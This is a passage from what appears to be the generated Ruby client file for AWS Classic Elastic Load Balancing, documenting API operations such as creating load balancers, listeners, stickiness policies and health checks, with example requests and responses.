# "Expect" header set to "100-continue". Defaults to `nil` which
# disables this behaviour. This value can safely be set per
#   request on the session yielded by {#session_for}.
#
# @option options [Boolean] :http_wire_trace (false) When `true`,
# HTTP debug output will be sent to the `:logger`.
#
# @option options [Boolean] :ssl_verify_peer (true) When `true`,
# SSL peer certificates are verified when establishing a
# connection.
#
# @option options [String] :ssl_ca_bundle Full path to the SSL
# certificate authority bundle file that should be used when
# verifying peer certificates. If you do not pass
#   `:ssl_ca_bundle` or `:ssl_ca_directory`, the system default
# will be used if available.
#
# @option options [String] :ssl_ca_directory Full path of the
# directory that contains the unbundled SSL certificate
# authority files for verifying peer certificates. If you do
#   not pass `:ssl_ca_bundle` or `:ssl_ca_directory`, the
# system default will be used if available.
#
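# @example A minimal construction sketch (the region and credential values
#   shown are placeholders, not defaults of this SDK):
#
#   client = Aws::ElasticLoadBalancing::Client.new(
#     region: "us-west-2",
#     credentials: Aws::Credentials.new("ACCESS_KEY_ID", "SECRET_ACCESS_KEY")
#   )
#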
def initialize(*args)
super
end
# @!group API Operations
# Adds the specified tags to the specified load balancer. Each load
# balancer can have a maximum of 10 tags.
#
# Each tag consists of a key and an optional value. If a tag with the
# same key is already associated with the load balancer, `AddTags`
# updates its value.
#
# For more information, see [Tag Your Classic Load Balancer][1] in the
# *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/add-remove-tags.html
#
# @option params [required, Array<String>] :load_balancer_names
# The name of the load balancer. You can specify one load balancer only.
#
# @option params [required, Array<Types::Tag>] :tags
# The tags.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To add tags to a load balancer
#
# # This example adds two tags to the specified load balancer.
#
# resp = client.add_tags({
# load_balancer_names: [
# "my-load-balancer",
# ],
# tags: [
# {
# key: "project",
# value: "lima",
# },
# {
# key: "department",
# value: "digital-media",
# },
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.add_tags({
# load_balancer_names: ["AccessPointName"], # required
# tags: [ # required
# {
# key: "TagKey", # required
# value: "TagValue",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/AddTags AWS API Documentation
#
# @overload add_tags(params = {})
# @param [Hash] params ({})
def add_tags(params = {}, options = {})
req = build_request(:add_tags, params)
req.send_request(options)
end
# Associates one or more security groups with your load balancer in a
# virtual private cloud (VPC). The specified security groups override
# the previously associated security groups.
#
# For more information, see [Security Groups for Load Balancers in a
# VPC][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-security-groups.html#elb-vpc-security-groups
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :security_groups
# The IDs of the security groups to associate with the load balancer.
# Note that you cannot specify the name of the security group.
#
# @return [Types::ApplySecurityGroupsToLoadBalancerOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ApplySecurityGroupsToLoadBalancerOutput#security_groups #security_groups} => Array<String>
#
#
# @example Example: To associate a security group with a load balancer in a VPC
#
# # This example associates a security group with the specified load balancer in a VPC.
#
# resp = client.apply_security_groups_to_load_balancer({
# load_balancer_name: "my-load-balancer",
# security_groups: [
# "sg-fc448899",
# ],
# })
#
# resp.to_h outputs the following:
# {
# security_groups: [
# "sg-fc448899",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.apply_security_groups_to_load_balancer({
# load_balancer_name: "AccessPointName", # required
# security_groups: ["SecurityGroupId"], # required
# })
#
# @example Response structure
#
# resp.security_groups #=> Array
# resp.security_groups[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/ApplySecurityGroupsToLoadBalancer AWS API Documentation
#
# @overload apply_security_groups_to_load_balancer(params = {})
# @param [Hash] params ({})
def apply_security_groups_to_load_balancer(params = {}, options = {})
req = build_request(:apply_security_groups_to_load_balancer, params)
req.send_request(options)
end
# Adds one or more subnets to the set of configured subnets for the
# specified load balancer.
#
# The load balancer evenly distributes requests across all registered
# subnets. For more information, see [Add or Remove Subnets for Your
# Load Balancer in a VPC][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-manage-subnets.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<String>] :subnets
# The IDs of the subnets to add. You can add only one subnet per
# Availability Zone.
#
# @return [Types::AttachLoadBalancerToSubnetsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::AttachLoadBalancerToSubnetsOutput#subnets #subnets} => Array<String>
#
#
# @example Example: To attach subnets to a load balancer
#
# # This example adds the specified subnet to the set of configured subnets for the specified load balancer.
#
# resp = client.attach_load_balancer_to_subnets({
# load_balancer_name: "my-load-balancer",
# subnets: [
# "subnet-0ecac448",
# ],
# })
#
# resp.to_h outputs the following:
# {
# subnets: [
# "subnet-15aaab61",
# "subnet-0ecac448",
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.attach_load_balancer_to_subnets({
# load_balancer_name: "AccessPointName", # required
# subnets: ["SubnetId"], # required
# })
#
# @example Response structure
#
# resp.subnets #=> Array
# resp.subnets[0] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/AttachLoadBalancerToSubnets AWS API Documentation
#
# @overload attach_load_balancer_to_subnets(params = {})
# @param [Hash] params ({})
def attach_load_balancer_to_subnets(params = {}, options = {})
req = build_request(:attach_load_balancer_to_subnets, params)
req.send_request(options)
end
# Specifies the health check settings to use when evaluating the health
# state of your EC2 instances.
#
# For more information, see [Configure Health Checks for Your Load
# Balancer][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-healthchecks.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Types::HealthCheck] :health_check
# The configuration information.
#
# @return [Types::ConfigureHealthCheckOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ConfigureHealthCheckOutput#health_check #health_check} => Types::HealthCheck
#
#
# @example Example: To specify the health check settings for your backend EC2 instances
#
# # This example specifies the health check settings used to evaluate the health of your backend EC2 instances.
#
# resp = client.configure_health_check({
# health_check: {
# healthy_threshold: 2,
# interval: 30,
# target: "HTTP:80/png",
# timeout: 3,
# unhealthy_threshold: 2,
# },
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# health_check: {
# healthy_threshold: 2,
# interval: 30,
# target: "HTTP:80/png",
# timeout: 3,
# unhealthy_threshold: 2,
# },
# }
#
# @example Request syntax with placeholder values
#
# resp = client.configure_health_check({
# load_balancer_name: "AccessPointName", # required
# health_check: { # required
# target: "HealthCheckTarget", # required
# interval: 1, # required
# timeout: 1, # required
# unhealthy_threshold: 1, # required
# healthy_threshold: 1, # required
# },
# })
#
# @example Response structure
#
# resp.health_check.target #=> String
# resp.health_check.interval #=> Integer
# resp.health_check.timeout #=> Integer
# resp.health_check.unhealthy_threshold #=> Integer
# resp.health_check.healthy_threshold #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/ConfigureHealthCheck AWS API Documentation
#
# @overload configure_health_check(params = {})
# @param [Hash] params ({})
def configure_health_check(params = {}, options = {})
req = build_request(:configure_health_check, params)
req.send_request(options)
end
# Generates a stickiness policy with sticky session lifetimes that
# follow that of an application-generated cookie. This policy can be
# associated only with HTTP/HTTPS listeners.
#
# This policy is similar to the policy created by
# CreateLBCookieStickinessPolicy, except that the lifetime of the
# special Elastic Load Balancing cookie, `AWSELB`, follows the lifetime
# of the application-generated cookie specified in the policy
# configuration. The load balancer only inserts a new stickiness cookie
# when the application response includes a new application cookie.
#
# If the application cookie is explicitly removed or expires, the
# session stops being sticky until a new application cookie is issued.
#
# For more information, see [Application-Controlled Session
# Stickiness][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-sticky-sessions.html#enable-sticky-sessions-application
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, String] :policy_name
# The name of the policy being created. Policy names must consist of
# alphanumeric characters and dashes (-). This name must be unique
# within the set of policies for this load balancer.
#
# @option params [required, String] :cookie_name
# The name of the application cookie used for stickiness.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To generate a stickiness policy for your load balancer
#
# # This example generates a stickiness policy that follows the sticky session lifetimes of the application-generated
# # cookie.
#
# resp = client.create_app_cookie_stickiness_policy({
# cookie_name: "my-app-cookie",
# load_balancer_name: "my-load-balancer",
# policy_name: "my-app-cookie-policy",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.create_app_cookie_stickiness_policy({
# load_balancer_name: "AccessPointName", # required
# policy_name: "PolicyName", # required
# cookie_name: "CookieName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateAppCookieStickinessPolicy AWS API Documentation
#
# @overload create_app_cookie_stickiness_policy(params = {})
# @param [Hash] params ({})
def create_app_cookie_stickiness_policy(params = {}, options = {})
req = build_request(:create_app_cookie_stickiness_policy, params)
req.send_request(options)
end
# Generates a stickiness policy with sticky session lifetimes controlled
# by the lifetime of the browser (user-agent) or a specified expiration
# period. This policy can be associated only with HTTP/HTTPS listeners.
#
# When a load balancer implements this policy, the load balancer uses a
# special cookie to track the instance for each request. When the load
# balancer receives a request, it first checks to see if this cookie is
# present in the request. If so, the load balancer sends the request to
# the application server specified in the cookie. If not, the load
# balancer sends the request to a server that is chosen based on the
# existing load-balancing algorithm.
#
# A cookie is inserted into the response for binding subsequent requests
# from the same user to that server. The validity of the cookie is based
# on the cookie expiration time, which is specified in the policy
# configuration.
#
# For more information, see [Duration-Based Session Stickiness][1] in
# the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-sticky-sessions.html#enable-sticky-sessions-duration
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, String] :policy_name
# The name of the policy being created. Policy names must consist of
# alphanumeric characters and dashes (-). This name must be unique
# within the set of policies for this load balancer.
#
# @option params [Integer] :cookie_expiration_period
# The time period, in seconds, after which the cookie should be
# considered stale. If you do not specify this parameter, the default
# value is 0, which indicates that the sticky session should last for
# the duration of the browser session.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To generate a duration-based stickiness policy for your load balancer
#
# # This example generates a stickiness policy with sticky session lifetimes controlled by the specified expiration period.
#
# resp = client.create_lb_cookie_stickiness_policy({
# cookie_expiration_period: 60,
# load_balancer_name: "my-load-balancer",
# policy_name: "my-duration-cookie-policy",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.create_lb_cookie_stickiness_policy({
# load_balancer_name: "AccessPointName", # required
# policy_name: "PolicyName", # required
# cookie_expiration_period: 1,
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateLBCookieStickinessPolicy AWS API Documentation
#
# @overload create_lb_cookie_stickiness_policy(params = {})
# @param [Hash] params ({})
def create_lb_cookie_stickiness_policy(params = {}, options = {})
req = build_request(:create_lb_cookie_stickiness_policy, params)
req.send_request(options)
end
# Creates a Classic Load Balancer.
#
# You can add listeners, security groups, subnets, and tags when you
# create your load balancer, or you can add them later using
# CreateLoadBalancerListeners, ApplySecurityGroupsToLoadBalancer,
# AttachLoadBalancerToSubnets, and AddTags.
#
# To describe your current load balancers, see DescribeLoadBalancers.
# When you are finished with a load balancer, you can delete it using
# DeleteLoadBalancer.
#
# You can create up to 20 load balancers per region per account. You can
# request an increase for the number of load balancers for your account.
# For more information, see [Limits for Your Classic Load Balancer][1]
# in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-limits.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# This name must be unique within your set of load balancers for the
# region, must have a maximum of 32 characters, must contain only
# alphanumeric characters or hyphens, and cannot begin or end with a
# hyphen.
#
# @option params [required, Array<Types::Listener>] :listeners
# The listeners.
#
# For more information, see [Listeners for Your Classic Load
# Balancer][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-listener-config.html
#
# @option params [Array<String>] :availability_zones
# One or more Availability Zones from the same region as the load
# balancer.
#
# You must specify at least one Availability Zone.
#
# You can add more Availability Zones after you create the load balancer
# using EnableAvailabilityZonesForLoadBalancer.
#
# @option params [Array<String>] :subnets
# The IDs of the subnets in your VPC to attach to the load balancer.
# Specify one subnet per Availability Zone specified in
# `AvailabilityZones`.
#
# @option params [Array<String>] :security_groups
# The IDs of the security groups to assign to the load balancer.
#
# @option params [String] :scheme
# The type of a load balancer. Valid only for load balancers in a VPC.
#
# By default, Elastic Load Balancing creates an Internet-facing load
# balancer with a DNS name that resolves to public IP addresses. For
# more information about Internet-facing and Internal load balancers,
# see [Load Balancer Scheme][1] in the *Elastic Load Balancing User
# Guide*.
#
# Specify `internal` to create a load balancer with a DNS name that
# resolves to private IP addresses.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/userguide/how-elastic-load-balancing-works.html#load-balancer-scheme
#
# @option params [Array<Types::Tag>] :tags
# A list of tags to assign to the load balancer.
#
# For more information about tagging your load balancer, see [Tag Your
# Classic Load Balancer][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/add-remove-tags.html
#
# @return [Types::CreateAccessPointOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::CreateAccessPointOutput#dns_name #dns_name} => String
#
#
# @example Example: To create an HTTP load balancer in a VPC
#
# # This example creates a load balancer with an HTTP listener in a VPC.
#
# resp = client.create_load_balancer({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# ],
# load_balancer_name: "my-load-balancer",
# security_groups: [
# "sg-a61988c3",
# ],
# subnets: [
# "subnet-15aaab61",
# ],
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "my-load-balancer-1234567890.us-west-2.elb.amazonaws.com",
# }
#
# @example Example: To create an HTTP load balancer in EC2-Classic
#
# # This example creates a load balancer with an HTTP listener in EC2-Classic.
#
# resp = client.create_load_balancer({
# availability_zones: [
# "us-west-2a",
# ],
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "my-load-balancer-123456789.us-west-2.elb.amazonaws.com",
# }
#
# @example Example: To create an HTTPS load balancer in a VPC
#
# # This example creates a load balancer with an HTTPS listener in a VPC.
#
# resp = client.create_load_balancer({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 443,
# protocol: "HTTPS",
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/my-server-cert",
# },
# ],
# load_balancer_name: "my-load-balancer",
# security_groups: [
# "sg-a61988c3",
# ],
# subnets: [
# "subnet-15aaab61",
# ],
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "my-load-balancer-1234567890.us-west-2.elb.amazonaws.com",
# }
#
# @example Example: To create an HTTPS load balancer in EC2-Classic
#
# # This example creates a load balancer with an HTTPS listener in EC2-Classic.
#
# resp = client.create_load_balancer({
# availability_zones: [
# "us-west-2a",
# ],
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 443,
# protocol: "HTTPS",
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/my-server-cert",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "my-load-balancer-123456789.us-west-2.elb.amazonaws.com",
# }
#
# @example Example: To create an internal load balancer
#
# # This example creates an internal load balancer with an HTTP listener in a VPC.
#
# resp = client.create_load_balancer({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# ],
# load_balancer_name: "my-load-balancer",
# scheme: "internal",
# security_groups: [
# "sg-a61988c3",
# ],
# subnets: [
# "subnet-15aaab61",
# ],
# })
#
# resp.to_h outputs the following:
# {
# dns_name: "internal-my-load-balancer-123456789.us-west-2.elb.amazonaws.com",
# }
#
# @example Request syntax with placeholder values
#
# resp = client.create_load_balancer({
# load_balancer_name: "AccessPointName", # required
# listeners: [ # required
# {
# protocol: "Protocol", # required
# load_balancer_port: 1, # required
# instance_protocol: "Protocol",
# instance_port: 1, # required
# ssl_certificate_id: "SSLCertificateId",
# },
# ],
# availability_zones: ["AvailabilityZone"],
# subnets: ["SubnetId"],
# security_groups: ["SecurityGroupId"],
# scheme: "LoadBalancerScheme",
# tags: [
# {
# key: "TagKey", # required
# value: "TagValue",
# },
# ],
# })
#
# @example Response structure
#
# resp.dns_name #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateLoadBalancer AWS API Documentation
#
# @overload create_load_balancer(params = {})
# @param [Hash] params ({})
def create_load_balancer(params = {}, options = {})
req = build_request(:create_load_balancer, params)
req.send_request(options)
end
# Creates one or more listeners for the specified load balancer. If a
# listener with the specified port does not already exist, it is
# created; otherwise, the properties of the new listener must match the
# properties of the existing listener.
#
# For more information, see [Listeners for Your Classic Load
# Balancer][1] in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-listener-config.html
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<Types::Listener>] :listeners
# The listeners.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To create an HTTP listener for a load balancer
#
# # This example creates a listener for your load balancer at port 80 using the HTTP protocol.
#
# resp = client.create_load_balancer_listeners({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 80,
# protocol: "HTTP",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# @example Example: To create an HTTPS listener for a load balancer
#
# # This example creates a listener for your load balancer at port 443 using the HTTPS protocol.
#
# resp = client.create_load_balancer_listeners({
# listeners: [
# {
# instance_port: 80,
# instance_protocol: "HTTP",
# load_balancer_port: 443,
# protocol: "HTTPS",
# ssl_certificate_id: "arn:aws:iam::123456789012:server-certificate/my-server-cert",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.create_load_balancer_listeners({
# load_balancer_name: "AccessPointName", # required
# listeners: [ # required
# {
# protocol: "Protocol", # required
# load_balancer_port: 1, # required
# instance_protocol: "Protocol",
# instance_port: 1, # required
# ssl_certificate_id: "SSLCertificateId",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateLoadBalancerListeners AWS API Documentation
#
# @overload create_load_balancer_listeners(params = {})
# @param [Hash] params ({})
def create_load_balancer_listeners(params = {}, options = {})
req = build_request(:create_load_balancer_listeners, params)
req.send_request(options)
end
# Creates a policy with the specified attributes for the specified load
# balancer.
#
# Policies are settings that are saved for your load balancer and that
# can be applied to the listener or the application server, depending on
# the policy type.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, String] :policy_name
# The name of the load balancer policy to be created. This name must be
# unique within the set of policies for this load balancer.
#
# @option params [required, String] :policy_type_name
# The name of the base policy type. To get the list of policy types, use
# DescribeLoadBalancerPolicyTypes.
#
# @option params [Array<Types::PolicyAttribute>] :policy_attributes
# The policy attributes.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To create a policy that enables Proxy Protocol on a load balancer
#
# # This example creates a policy that enables Proxy Protocol on the specified load balancer.
#
# resp = client.create_load_balancer_policy({
# load_balancer_name: "my-load-balancer",
# policy_attributes: [
# {
# attribute_name: "ProxyProtocol",
# attribute_value: "true",
# },
# ],
# policy_name: "my-ProxyProtocol-policy",
# policy_type_name: "ProxyProtocolPolicyType",
# })
#
# @example Example: To create a public key policy
#
# # This example creates a public key policy.
#
# resp = client.create_load_balancer_policy({
# load_balancer_name: "my-load-balancer",
# policy_attributes: [
# {
# attribute_name: "PublicKey",
# attribute_value: "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwAYUjnfyEyXr1pxjhFWBpMlggUcqoi3kl+dS74kj//c6x7ROtusUaeQCTgIUkayttRDWchuqo1pHC1u+n5xxXnBBe2ejbb2WRsKIQ5rXEeixsjFpFsojpSQKkzhVGI6mJVZBJDVKSHmswnwLBdofLhzvllpovBPTHe+o4haAWvDBALJU0pkSI1FecPHcs2hwxf14zHoXy1e2k36A64nXW43wtfx5qcVSIxtCEOjnYRg7RPvybaGfQ+v6Iaxb/+7J5kEvZhTFQId+bSiJImF1FSUT1W1xwzBZPUbcUkkXDj45vC2s3Z8E+Lk7a3uZhvsQHLZnrfuWjBWGWvZ/MhZYgEXAMPLE",
# },
# ],
# policy_name: "my-PublicKey-policy",
# policy_type_name: "PublicKeyPolicyType",
# })
#
# @example Example: To create a backend server authentication policy
#
# # This example creates a backend server authentication policy that enables authentication on your backend instance using a
# # public key policy.
#
# resp = client.create_load_balancer_policy({
# load_balancer_name: "my-load-balancer",
# policy_attributes: [
# {
# attribute_name: "PublicKeyPolicyName",
# attribute_value: "my-PublicKey-policy",
# },
# ],
# policy_name: "my-authentication-policy",
# policy_type_name: "BackendServerAuthenticationPolicyType",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.create_load_balancer_policy({
# load_balancer_name: "AccessPointName", # required
# policy_name: "PolicyName", # required
# policy_type_name: "PolicyTypeName", # required
# policy_attributes: [
# {
# attribute_name: "AttributeName",
# attribute_value: "AttributeValue",
# },
# ],
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/CreateLoadBalancerPolicy AWS API Documentation
#
# @overload create_load_balancer_policy(params = {})
# @param [Hash] params ({})
def create_load_balancer_policy(params = {}, options = {})
req = build_request(:create_load_balancer_policy, params)
req.send_request(options)
end
# Deletes the specified load balancer.
#
# If you are attempting to recreate a load balancer, you must
# reconfigure all settings. The DNS name associated with a deleted load
    # balancer is no longer usable. The name and associated DNS record of
# the deleted load balancer no longer exist and traffic sent to any of
# its IP addresses is no longer delivered to your instances.
#
# If the load balancer does not exist or has already been deleted, the
# call to `DeleteLoadBalancer` still succeeds.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To delete a load balancer
#
# # This example deletes the specified load balancer.
#
# resp = client.delete_load_balancer({
# load_balancer_name: "my-load-balancer",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.delete_load_balancer({
# load_balancer_name: "AccessPointName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DeleteLoadBalancer AWS API Documentation
#
# @overload delete_load_balancer(params = {})
# @param [Hash] params ({})
def delete_load_balancer(params = {}, options = {})
req = build_request(:delete_load_balancer, params)
req.send_request(options)
end
# Deletes the specified listeners from the specified load balancer.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<Integer>] :load_balancer_ports
# The client port numbers of the listeners.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To delete a listener from your load balancer
#
# # This example deletes the listener for the specified port from the specified load balancer.
#
# resp = client.delete_load_balancer_listeners({
# load_balancer_name: "my-load-balancer",
# load_balancer_ports: [
# 80,
# ],
# })
#
# @example Request syntax with placeholder values
#
# resp = client.delete_load_balancer_listeners({
# load_balancer_name: "AccessPointName", # required
# load_balancer_ports: [1], # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DeleteLoadBalancerListeners AWS API Documentation
#
# @overload delete_load_balancer_listeners(params = {})
# @param [Hash] params ({})
def delete_load_balancer_listeners(params = {}, options = {})
req = build_request(:delete_load_balancer_listeners, params)
req.send_request(options)
end
# Deletes the specified policy from the specified load balancer. This
# policy must not be enabled for any listeners.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, String] :policy_name
# The name of the policy.
#
# @return [Struct] Returns an empty {Seahorse::Client::Response response}.
#
#
# @example Example: To delete a policy from your load balancer
#
# # This example deletes the specified policy from the specified load balancer. The policy must not be enabled on any
# # listener.
#
# resp = client.delete_load_balancer_policy({
# load_balancer_name: "my-load-balancer",
# policy_name: "my-duration-cookie-policy",
# })
#
# @example Request syntax with placeholder values
#
# resp = client.delete_load_balancer_policy({
# load_balancer_name: "AccessPointName", # required
# policy_name: "PolicyName", # required
# })
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DeleteLoadBalancerPolicy AWS API Documentation
#
# @overload delete_load_balancer_policy(params = {})
# @param [Hash] params ({})
def delete_load_balancer_policy(params = {}, options = {})
req = build_request(:delete_load_balancer_policy, params)
req.send_request(options)
end
# Deregisters the specified instances from the specified load balancer.
# After the instance is deregistered, it no longer receives traffic from
# the load balancer.
#
# You can use DescribeLoadBalancers to verify that the instance is
# deregistered from the load balancer.
#
# For more information, see [Register or De-Register EC2 Instances][1]
# in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-deregister-register-instances.html
#
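    # A hand-written sketch (not one of the generated examples below) of
    # pairing this call with the `instance_deregistered` waiter defined on
    # this client, so the caller blocks until the instance has actually left
    # the load balancer; the instance ID is a placeholder:
    #
    #     client.deregister_instances_from_load_balancer({
    #       load_balancer_name: "my-load-balancer",
    #       instances: [{ instance_id: "i-d6f6fae3" }],
    #     })
    #     client.wait_until(:instance_deregistered, {
    #       load_balancer_name: "my-load-balancer",
    #       instances: [{ instance_id: "i-d6f6fae3" }],
    #     })
    #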
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [required, Array<Types::Instance>] :instances
# The IDs of the instances.
#
# @return [Types::DeregisterEndPointsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DeregisterEndPointsOutput#instances #instances} => Array<Types::Instance>
#
#
# @example Example: To deregister instances from a load balancer
#
# # This example deregisters the specified instance from the specified load balancer.
#
# resp = client.deregister_instances_from_load_balancer({
# instances: [
# {
# instance_id: "i-d6f6fae3",
# },
# ],
# load_balancer_name: "my-load-balancer",
# })
#
# resp.to_h outputs the following:
# {
# instances: [
# {
# instance_id: "i-207d9717",
# },
# {
# instance_id: "i-afefb49b",
# },
# ],
# }
#
# @example Request syntax with placeholder values
#
# resp = client.deregister_instances_from_load_balancer({
# load_balancer_name: "AccessPointName", # required
# instances: [ # required
# {
# instance_id: "InstanceId",
# },
# ],
# })
#
# @example Response structure
#
# resp.instances #=> Array
# resp.instances[0].instance_id #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DeregisterInstancesFromLoadBalancer AWS API Documentation
#
# @overload deregister_instances_from_load_balancer(params = {})
# @param [Hash] params ({})
def deregister_instances_from_load_balancer(params = {}, options = {})
req = build_request(:deregister_instances_from_load_balancer, params)
req.send_request(options)
end
# Describes the current Elastic Load Balancing resource limits for your
# AWS account.
#
# For more information, see [Limits for Your Classic Load Balancer][1]
# in the *Classic Load Balancers Guide*.
#
#
#
# [1]: http://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-limits.html
#
# @option params [String] :marker
# The marker for the next set of results. (You received this marker from
# a previous call.)
#
# @option params [Integer] :page_size
# The maximum number of results to return with this call.
#
# @return [Types::DescribeAccountLimitsOutput] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::DescribeAccountLimitsOutput#limits #limits} => Array<Types::Limit>
# * {Types::DescribeAccountLimitsOutput#next_marker #next_marker} => String
#
# @example Request syntax with placeholder values
#
# resp = client.describe_account_limits({
# marker: "Marker",
# page_size: 1,
# })
#
# @example Response structure
#
# resp.limits #=> Array
# resp.limits[0].name #=> String
# resp.limits[0].max #=> String
# resp.next_marker #=> String
#
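    # A hand-written pagination sketch (not generated from the API model);
    # the loop and variable names are illustrative assumptions:
    #
    #     limits = []
    #     params = {}
    #     loop do
    #       page = client.describe_account_limits(params)
    #       limits.concat(page.limits)
    #       break if page.next_marker.nil? || page.next_marker.empty?
    #       params[:marker] = page.next_marker
    #     end
    #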
# @see http://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancing-2012-06-01/DescribeAccountLimits AWS API Documentation
#
# @overload describe_account_limits(params = {})
# @param [Hash] params ({})
def describe_account_limits(params = {}, options = {})
req = build_request(:describe_account_limits, params)
req.send_request(options)
end
# Describes the state of the specified instances with respect to the
# specified load balancer. If no instances are specified, the call
# describes the state of all instances that are currently registered
# with the load balancer. If instances are specified, their state is
# returned even if they are no longer registered with the load balancer.
# The state of terminated instances is not returned.
#
# @option params [required, String] :load_balancer_name
# The name of the load balancer.
#
# @option params [Array<Types::Instance>] :instances
# The IDs of the instances.
#
